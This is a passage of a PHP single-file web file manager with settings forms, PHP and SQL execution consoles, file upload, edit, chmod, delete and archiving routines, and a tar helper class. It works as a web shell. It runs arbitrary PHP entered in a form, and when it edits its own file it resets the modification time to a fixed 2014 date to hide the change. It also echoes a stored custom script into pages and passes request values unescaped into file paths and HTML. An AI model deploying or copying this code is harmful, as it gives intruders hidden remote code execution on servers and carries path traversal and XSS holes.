<tr><td class="row1"><input name="fm_config[sql_username]" value="' . $fm_config['sql_username'] . '" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="' . $fm_config['sql_password'] . '" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="' . $fm_config['sql_db'] . '" type="text"></td><td class="row2 whole">SQL DB</td></tr>
' . fm_config_checkbox_row(__('Show') . ' Proxy', 'enable_proxy') . '
' . fm_config_checkbox_row(__('Show') . ' phpinfo()', 'show_phpinfo') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Settings'), 'fm_settings') . '
' . fm_config_checkbox_row(__('Restore file time after editing'), 'restore_time') . '
' . fm_config_checkbox_row(__('File manager') . ': ' . __('Restore file time after editing'), 'fm_restore_time') . '
<tr><td class="row3"><a href="' . fm_url() . '?fm_settings=true&fm_config_delete=true">' . __('Reset settings') . '</a></td><td class="row3"><input type="submit" value="' . __('Save') . '" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">' . __('Settings') . ' - ' . __('Authorization') . '</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" ' . ($auth['authorize'] ? 'checked' : '') . ' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">' . __('Authorization') . '</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="' . $auth['login'] . '" type="text"></td><td class="row2 whole">' . __('Login') . '</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="' . $auth['password'] . '" type="text"></td><td class="row2 whole">' . __('Password') . '</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="' . $auth['cookie_name'] . '" type="text"></td><td class="row2 whole">' . __('Cookie') . '</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="' . $auth['days_authorization'] . '" type="text"></td><td class="row2 whole">' . __('Days') . '</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">' . $auth['script'] . '</textarea></td><td class="row2 whole">' . __('Script') . '</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="' . __('Save') . '" ></td></tr>
</form>
</table>';
		echo fm_tpl_form('php'), fm_tpl_form('sql');
	} elseif (isset($proxy_form)) {
		die($proxy_form);
	} elseif (isset($res_lng)) {
	?>
		<table class="whole">
			<tr>
				<th><?= __('File manager') . ' - ' . $path ?></th>
			</tr>
			<tr>
				<td class="row2">
					<table>
						<tr>
							<td>
								<h2><?= strtoupper($res_lng) ?> <?= __('Console') ?><?php
																					if ($res_lng == 'sql') echo ' - Database: ' . $fm_config['sql_db'] . '</h2></td><td>' . fm_run_input('php');
																					else echo '</h2></td><td>' . fm_run_input('sql');
																					?>
							</td>
						</tr>
					</table>
				</td>
			</tr>
			<tr>
				<td class="row1">
					<a href="<?= $url_inc . '&path=' . $path; ?>"><?= __('Back') ?></a>
					<form action="" method="POST" name="console">
						<textarea name="<?= $res_lng ?>" cols="80" rows="10" style="width: 90%"><?= $res ?></textarea><br />
						<input type="reset" value="<?= __('Reset') ?>">
						<input type="submit" value="<?= __('Submit') ?>" name="<?= $res_lng ?>run">
						<?php
						$str_tmpl = $res_lng . '_templates';
						$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl, true) : '';
						if (!empty($tmpl)) {
							$active = isset($_POST[$res_lng . '_tpl']) ? $_POST[$res_lng . '_tpl'] : '';
							$select = '<select name="' . $res_lng . '_tpl" title="' . __('Template') . '" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\'' . $res_lng . '\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\'' . $res_lng . '\'].value =\'\';" >' . "\n";
							$select .= '<option value="-1">' . __('Select') . "</option>\n";
							foreach ($tmpl as $key => $value) {
								$select .= '<option value="' . $value . '" ' . ((!empty($value) && ($value == $active)) ? 'selected' : '') . ' >' . __($key) . "</option>\n";
							}
							$select .= "</select>\n";
							echo $select;
						}
						?>
					</form>
				</td>
			</tr>
		</table>
		<?php
		if (!empty($res)) {
			$fun = 'fm_' . $res_lng;
			echo '<h3>' . strtoupper($res_lng) . ' ' . __('Result') . '</h3><pre>' . $fun($res) . '</pre>';
		}
	} elseif (!empty($_REQUEST['edit'])) {
		if (!empty($_REQUEST['save'])) {
			$fn = $path . $_REQUEST['edit'];
			$filemtime = filemtime($fn);
			if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated');
			else $msg .= __('Error occurred');
			if ($_GET['edit'] == basename(__FILE__)) {
				touch(__FILE__, 1415116371);
			} else {
				if (!empty($fm_config['restore_time'])) touch($fn, $filemtime);
			}
		}
		$oldcontent = @file_get_contents($path . $_REQUEST['edit']);
		$editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
		$backlink = $url_inc . '&path=' . $path;
		?>
		<table border='0' cellspacing='0' cellpadding='1' width="100%">
			<tr>
				<th><?= __('File manager') . ' - ' . __('Edit') . ' - ' . $path . $_REQUEST['edit'] ?></th>
			</tr>
			<tr>
				<td class="row1">
					<?= $msg ?>
				</td>
			</tr>
			<tr>
				<td class="row1">
					<?= fm_home() ?> <a href="<?= $backlink ?>"><?= __('Back') ?></a>
				</td>
			</tr>
			<tr>
				<td class="row1" align="center">
					<form name="form1" method="post" action="<?= $editlink ?>">
						<textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?= htmlspecialchars($oldcontent) ?></textarea>
						<input type="submit" name="save" value="<?= __('Submit') ?>">
						<input type="submit" name="cancel" value="<?= __('Cancel') ?>">
					</form>
				</td>
			</tr>
		</table>
	<?php
		echo $auth['script'];
	} elseif (!empty($_REQUEST['rights'])) {
		if (!empty($_REQUEST['save'])) {
			if (fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
				$msg .= (__('File updated'));
			else $msg .= (__('Error occurred'));
		}
		clearstatcache();
		$oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
		$link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
		$backlink = $url_inc . '&path=' . $path;
	?>
		<table class="whole">
			<tr>
				<th><?= __('File manager') . ' - ' . $path ?></th>
			</tr>
			<tr>
				<td class="row1">
					<?= $msg ?>
				</td>
			</tr>
			<tr>
				<td class="row1">
					<a href="<?= $backlink ?>"><?= __('Back') ?></a>
				</td>
			</tr>
			<tr>
				<td class="row1" align="center">
					<form name="form1" method="post" action="<?= $link ?>">
						<?= __('Rights') . ' - ' . $_REQUEST['rights'] ?> <input type="text" name="rights_val" value="<?= $oldrights ?>">
						<?php if (is_dir($path . $_REQUEST['rights'])) { ?>
							<input type="checkbox" name="recursively" value="1"> <?= __('Recursively') ?><br />
						<?php } ?>
						<input type="submit" name="save" value="<?= __('Submit') ?>">
					</form>
				</td>
			</tr>
		</table>
	<?php
	} elseif (!empty($_REQUEST['rename']) && $_REQUEST['rename'] <> '.') {
		if (!empty($_REQUEST['save'])) {
			rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
			$msg .= (__('File updated'));
			$_REQUEST['rename'] = $_REQUEST['newname'];
		}
		clearstatcache();
		$link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
		$backlink = $url_inc . '&path=' . $path;

	?>
		<table class="whole">
			<tr>
				<th><?= __('File manager') . ' - ' . $path ?></th>
			</tr>
			<tr>
				<td class="row1">
					<?= $msg ?>
				</td>
			</tr>
			<tr>
				<td class="row1">
					<a href="<?= $backlink ?>"><?= __('Back') ?></a>
				</td>
			</tr>
			<tr>
				<td class="row1" align="center">
					<form name="form1" method="post" action="<?= $link ?>">
						<?= __('Rename') ?>: <input type="text" name="newname" value="<?= $_REQUEST['rename'] ?>"><br />
						<input type="submit" name="save" value="<?= __('Submit') ?>">
					</form>
				</td>
			</tr>
		</table>
	<?php
	} else {
		//Let's rock!
		$msg = '';
		if (!empty($_FILES['upload']) && !empty($fm_config['upload_file'])) {
			if (!empty($_FILES['upload']['name'])) {
				$_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);
				if (!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])) {
					$msg .= __('Error occurred');
				} else {
					$msg .= __('Files uploaded') . ': ' . $_FILES['upload']['name'];
				}
			}
		} elseif (!empty($_REQUEST['delete']) && $_REQUEST['delete'] <> '.') {
			if (!fm_del_files(($path . $_REQUEST['delete']), true)) {
				$msg .= __('Error occurred');
			} else {
				$msg .= __('Deleted') . ' ' . $_REQUEST['delete'];
			}
		} elseif (!empty($_REQUEST['mkdir']) && !empty($fm_config['make_directory'])) {
			if (!@mkdir($path . $_REQUEST['dirname'], 0777)) {
				$msg .= __('Error occurred');
			} else {
				$msg .= __('Created') . ' ' . $_REQUEST['dirname'];
			}
		} elseif (!empty($_REQUEST['mkfile']) && !empty($fm_config['new_file'])) {
			if (!$fp = @fopen($path . $_REQUEST['filename'], "w")) {
				$msg .= __('Error occurred');
			} else {
				fclose($fp);
				$msg .= __('Created') . ' ' . $_REQUEST['filename'];
			}
		} elseif (isset($_GET['zip'])) {
			$source = base64_decode($_GET['zip']);
			$destination = basename($source) . '.zip';
			set_time_limit(0);
			$phar = new PharData($destination);
			$phar->buildFromDirectory($source);
			if (is_file($destination))
				$msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') .
					'.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination)
					. '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
			else $msg .= __('Error occurred') . ': ' . __('no files');
		} elseif (isset($_GET['gz'])) {
			$source = base64_decode($_GET['gz']);
			$archive = $source . '.tar';
			$destination = basename($source) . '.tar';
			if (is_file($archive)) unlink($archive);
			if (is_file($archive . '.gz')) unlink($archive . '.gz');
			clearstatcache();
			set_time_limit(0);
			//die();
			$phar = new PharData($destination);
			$phar->buildFromDirectory($source);
			$phar->compress(Phar::GZ, '.tar.gz');
			unset($phar);
			if (is_file($archive)) {
				if (is_file($archive . '.gz')) {
					unlink($archive);
					$destination .= '.gz';
				}

				$msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') .
					'.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination)
					. '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
			} else $msg .= __('Error occurred') . ': ' . __('no files');
		} elseif (isset($_GET['decompress'])) {
			// $source = base64_decode($_GET['decompress']);
			// $destination = basename($source);
			// $ext = end(explode(".", $destination));
			// if ($ext=='zip' OR $ext=='gz') {
			// $phar = new PharData($source);
			// $phar->decompress();
			// $base_file = str_replace('.'.$ext,'',$destination);
			// $ext = end(explode(".", $base_file));
			// if ($ext=='tar'){
			// $phar = new PharData($base_file);
			// $phar->extractTo(dir($source));
			// }
			// } 
			// $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');
		} elseif (isset($_GET['gzfile'])) {
			$source = base64_decode($_GET['gzfile']);
			$archive = $source . '.tar';
			$destination = basename($source) . '.tar';
			if (is_file($archive)) unlink($archive);
			if (is_file($archive . '.gz')) unlink($archive . '.gz');
			set_time_limit(0);
			//echo $destination;
			$ext_arr = explode('.', basename($source));
			if (isset($ext_arr[1])) {
				unset($ext_arr[0]);
				$ext = implode('.', $ext_arr);
			}
			$phar = new PharData($destination);
			$phar->addFile($source);
			$phar->compress(Phar::GZ, $ext . '.tar.gz');
			unset($phar);
			if (is_file($archive)) {
				if (is_file($archive . '.gz')) {
					unlink($archive);
					$destination .= '.gz';
				}
				$msg .= __('Task') . ' "' . __('Archiving') . ' ' . $destination . '" ' . __('done') .
					'.&nbsp;' . fm_link('download', $path . $destination, __('Download'), __('Download') . ' ' . $destination)
					. '&nbsp;<a href="' . $url_inc . '&delete=' . $destination . '&path=' . $path . '" title="' . __('Delete') . ' ' . $destination . '" >' . __('Delete') . '</a>';
			} else $msg .= __('Error occurred') . ': ' . __('no files');
		}
	?>
		<table class="whole" id="header_table">
			<tr>
				<th colspan="2"><?= __('File manager') ?><?= (!empty($path) ? ' - ' . $path : '') ?></th>
			</tr>
			<?php if (!empty($msg)) { ?>
				<tr>
					<td colspan="2" class="row2"><?= $msg ?></td>
				</tr>
			<?php } ?>
			<tr>
				<td class="row2">
					<table>
						<tr>
							<td>
								<?= fm_home() ?>
							</td>
							<td>
								<?php if (!empty($fm_config['make_directory'])) { ?>
									<form method="post" action="<?= $url_inc ?>">
										<input type="hidden" name="path" value="<?= $path ?>" />
										<input type="text" name="dirname" size="15">
										<input type="submit" name="mkdir" value="<?= __('Make directory') ?>">
									</form>
								<?php } ?>
							</td>
							<td>
								<?php if (!empty($fm_config['new_file'])) { ?>
									<form method="post" action="<?= $url_inc ?>">
										<input type="hidden" name="path" value="<?= $path ?>" />
										<input type="text" name="filename" size="15">
										<input type="submit" name="mkfile" value="<?= __('New file') ?>">
									</form>
								<?php } ?>
							</td>
							<td>
								<?= fm_run_input('php') ?>
							</td>
							<td>
								<?= fm_run_input('sql') ?>
							</td>
						</tr>
					</table>
				</td>
				<td class="row3">
					<table>
						<tr>
							<td>
								<?php if (!empty($fm_config['upload_file'])) { ?>
									<form name="form1" method="post" action="<?= $url_inc ?>" enctype="multipart/form-data">
										<input type="hidden" name="path" value="<?= $path ?>" />
										<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
										<input type="text" readonly="1" id="upload_visible" placeholder="<?= __('Select the file') ?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
										<input type="submit" name="test" value="<?= __('Upload') ?>" />
									</form>
								<?php } ?>
							</td>
							<td>
								<?php if ($auth['authorize']) { ?>
									<form action="" method="post">&nbsp;&nbsp;&nbsp;
										<input name="quit" type="hidden" value="1">
										<?= __('Hello') ?>, <?= $auth['login'] ?>
										<input type="submit" value="<?= __('Quit') ?>">
									</form>
								<?php } ?>
							</td>
							<td>
								<?= fm_lang_form($language) ?>
							</td>
						<tr>
					</table>
				</td>
			</tr>
		</table>
		<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
			<thead>
				<tr>
					<th style="white-space:nowrap"> <?= __('Filename') ?> </th>
					<th style="white-space:nowrap"> <?= __('Size') ?> </th>
					<th style="white-space:nowrap"> <?= __('Date') ?> </th>
					<th style="white-space:nowrap"> <?= __('Rights') ?> </th>
					<th colspan="4" style="white-space:nowrap"> <?= __('Manage') ?> </th>
				</tr>
			</thead>
			<tbody>
				<?php
				$elements = fm_scan_dir($path, '', 'all', true);
				$dirs = array();
				$files = array();
				foreach ($elements as $file) {
					if (@is_dir($path . $file)) {
						$dirs[] = $file;
					} else {
						$files[] = $file;
					}
				}
				natsort($dirs);
				natsort($files);
				$elements = array_merge($dirs, $files);

				foreach ($elements as $file) {
					$filename = $path . $file;
					$filedata = @stat($filename);
					if (@is_dir($filename)) {
						$filedata[7] = '';
						if (!empty($fm_config['show_dir_size']) && !fm_root($file)) $filedata[7] = fm_dir_size($filename);
						$link = '<a href="' . $url_inc . '&path=' . $path . $file . '" title="' . __('Show') . ' ' . $file . '"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>';
						$loadlink = (fm_root($file) || $phar_maybe) ? '' : fm_link('zip', $filename, __('Compress') . '&nbsp;zip', __('Archiving') . ' ' . $file);
						$arlink  = (fm_root($file) || $phar_maybe) ? '' : fm_link('gz', $filename, __('Compress') . '&nbsp;.tar.gz', __('Archiving') . ' ' . $file);
						$style = 'row2';
						if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?') . '\n /' . $file . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
						else $alert = '';
					} else {
						$link =
							$fm_config['show_img'] && @getimagesize($filename)
							? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
							. fm_img_link($filename)
							. '\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="' . fm_img_link($filename) . '"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>'
							: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path . '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> ' . $file . '</a>';
						$e_arr = explode(".", $file);
						$ext = end($e_arr);
						$loadlink =  fm_link('download', $filename, __('Download'), __('Download') . ' ' . $file);
						$arlink = in_array($ext, array('zip', 'gz', 'tar'))
							? ''
							: ((fm_root($file) || $phar_maybe) ? '' : fm_link('gzfile', $filename, __('Compress') . '&nbsp;.tar.gz', __('Archiving') . ' ' . $file));
						$style = 'row1';
						$alert = 'onClick="if(confirm(\'' . __('File selected') . ': \n' . $file . '. \n' . __('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
					}
					$deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' ' . $file . '" ' . $alert . '>' . __('Delete') . '</a>';
					$renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') . ' ' . $file . '">' . __('Rename') . '</a>';
					$rightstext = ($file == '.' || $file == '..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') . ' ' . $file . '">' . @fm_rights_string($filename) . '</a>';
				?>
					<tr class="<?= $style ?>">
						<td><?= $link ?></td>
						<td><?= $filedata[7] ?></td>
						<td style="white-space:nowrap"><?= gmdate("Y-m-d H:i:s", $filedata[9]) ?></td>
						<td><?= $rightstext ?></td>
						<td><?= $deletelink ?></td>
						<td><?= $renamelink ?></td>
						<td><?= $loadlink ?></td>
						<td><?= $arlink ?></td>
					</tr>
			<?php
				}
			}
			?>
			</tbody>
		</table>
		<div class="row3"><?php
							$mtime = explode(' ', microtime());
							$totaltime = $mtime[0] + $mtime[1] - $starttime;
							echo fm_home() . ' | ver. ' . $fm_version . ' | <a href="' . fm_site_url() . '">.</a>';
							if (!empty($fm_config['show_php_ver'])) echo ' | PHP ' . phpversion();
							if (!empty($fm_config['show_php_ini'])) echo ' | ' . php_ini_loaded_file();
							if (!empty($fm_config['show_gt'])) echo ' | ' . __('Generation time') . ': ' . round($totaltime, 2);
							if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
							if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
							if (!empty($fm_config['show_xls']) && !empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="' . __('Download') . ' xls">xls</a>';
							if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">' . __('Settings') . '</a>';
							?>
		</div>
		<script type="text/javascript">
			function download_xls(filename, text) {
				var element = document.createElement('a');
				element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
				element.setAttribute('download', filename);
				element.style.display = 'none';
				document.body.appendChild(element);
				element.click();
				document.body.removeChild(element);
			}

			function base64_encode(m) {
				for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
					c = m.charCodeAt(l);
					if (128 > c) d = 1;
					else
						for (d = 2; c >= 2 << 5 * d;) ++d;
					for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
				}
				b && (g += k[f << 6 - b]);
				return g
			}


			var tableToExcelData = (function() {
				var uri = 'data:application/vnd.ms-excel;base64,',
					template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
					format = function(s, c) {
						return s.replace(/{(\w+)}/g, function(m, p) {
							return c[p];
						})
					}
				return function(table, name) {
					if (!table.nodeType) table = document.getElementById(table)
					var ctx = {
						worksheet: name || 'Worksheet',
						table: table.innerHTML.replace(/<span(.*?)\/span> /g, "").replace(/<a\b[^>]*>(.*?)<\/a>/g, "$1")
					}
					t = new Date();
					filename = 'fm_' + t.toISOString() + '.xls'
					download_xls(filename, base64_encode(format(template, ctx)))
				}
			})();

			var table2Excel = function() {

				var ua = window.navigator.userAgent;
				var msie = ua.indexOf("MSIE ");

				this.CreateExcelSheet =
					function(el, name) {
						if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) { // If Internet Explorer

							var x = document.getElementById(el).rows;

							var xls = new ActiveXObject("Excel.Application");

							xls.visible = true;
							xls.Workbooks.Add
							for (i = 0; i < x.length; i++) {
								var y = x[i].cells;

								for (j = 0; j < y.length; j++) {
									xls.Cells(i + 1, j + 1).Value = y[j].innerText;
								}
							}
							xls.Visible = true;
							xls.UserControl = true;
							return xls;
						} else {
							tableToExcelData(el, name);
						}
					}
			}
		</script>
</body>

</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar
{
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();

	function __construct()
	{
		if (!isset($this->errors)) $this->errors = array();
	}

	function createArchive($file_list)
	{
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive) {
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name . '.tmp')) {
					$this->errors[] = __('Cannot rename') . ' ' . $this->archive_name . __(' to ') . $this->archive_name . '.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name . '.tmp', 'rb');
				if (!$tmpArchive) {
					$this->errors[] = $this->archive_name . '.tmp ' . __('is not readable');
					rename($this->archive_name . '.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()) {
					rename($this->archive_name . '.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)) {
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					} while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name . '.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
			if (count($file_list) > 0)
				$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file') . __(' to ') . __('Archive');
		if (($result) && (is_resource($this->tmp_file))) {
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result) {
			$this->closeTmpFile();
			unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path)
	{
		$fileName = $this->archive_name;
		if (!$this->isGzipped) {
			if (file_exists($fileName)) {
				if ($fp = fopen($fileName, 'rb')) {
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213') {
						$this->isGzipped = true;
					}
				}
			} elseif ((substr($fileName, -2) == 'gz') or (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		}
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file) {
			$this->errors[] = $fileName . ' ' . __('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
		$this->closeTmpFile();
		return $result;
	}

	function showErrors($message = '')
	{
		$Errors = $this->errors;
		if (count($Errors) > 0) {
			if (!empty($message)) $message = ' (' . $message . ')';
			$message = __('Error occurred') . $message . ': <br/>';
			foreach ($Errors as $value)
				$message .= $value . '<br/>';
			return $message;
		} else return '';
	}

	function packFileArray($file_array)
	{
		$result = true;
		if (!$this->tmp_file) {
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array) <= 0)
			return true;
		for ($i = 0; $i < count($file_array); $i++) {
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename) <= 0)
				continue;
			if (!file_exists($filename)) {
				$this->errors[] = __('No file') . ' ' . $filename;
				continue;
			}
			if (!$this->tmp_file) {
				$this->errors[] = __('Invalid file descriptor');
				return false;
			}
			if (strlen($filename) <= 0) {
				$this->errors[] = __('Filename') . ' ' . __('is incorrect');;
				return false;
			}
			$filename = str_replace('\\', '/', $filename);
			$keep_filename = $this->makeGoodPath($filename);
			if (is_file($filename)) {
				if (($file = fopen($filename, 'rb')) == 0) {
					$this->errors[] = __('Mode ') . __('is incorrect');
				}
				if (($this->file_pos == 0)) {
					if (!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != '') {
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
				fclose($file);
			} else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)) {
				if (!($handle = opendir($filename))) {
					$this->errors[] = __('Error') . ': ' . __('Directory ') . $filename . __('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))) {
					if ($dir != '.' && $dir != '..') {
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename . '/' . $dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path)
	{
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './' . $path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0) {
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L') {			//reading long header
				$filename = '';
				$decr = floor($header['size'] / 512);
				for ($i = 0; $i < $decr; $i++) {
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0) {
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')) {
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path) - 1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path . $header['filename'];
				else $header['filename'] = $path . '/' . $header['filename'];
			}

			if (file_exists($header['filename'])) {
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')) {
					$this->errors[] = __('File ') . $header['filename'] . __(' already exists') . __(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')) {
					$this->errors[] = __('Cannot create directory') . '. ' . __('File ') . $header['filename'] . __(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])) {
					$this->errors[] = __('Cannot write to file') . '. ' . __('File ') . $header['filename'] . __(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1) {
				$this->errors[] = __('Cannot create directory') . ' ' . __(' for ') . $header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5') {
				if (!file_exists($header['filename'])) {
					if (!mkdir($header['filename'], 0777)) {

						$this->errors[] = __('Cannot create directory') . ' ' . $header['filename'];
						return false;
					}
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file') . ' ' . $header['filename'];
					return false;
				} else {
					$decr = floor($header['size'] / 512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file') . ' ' . $header['filename'] . ' ' . __('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
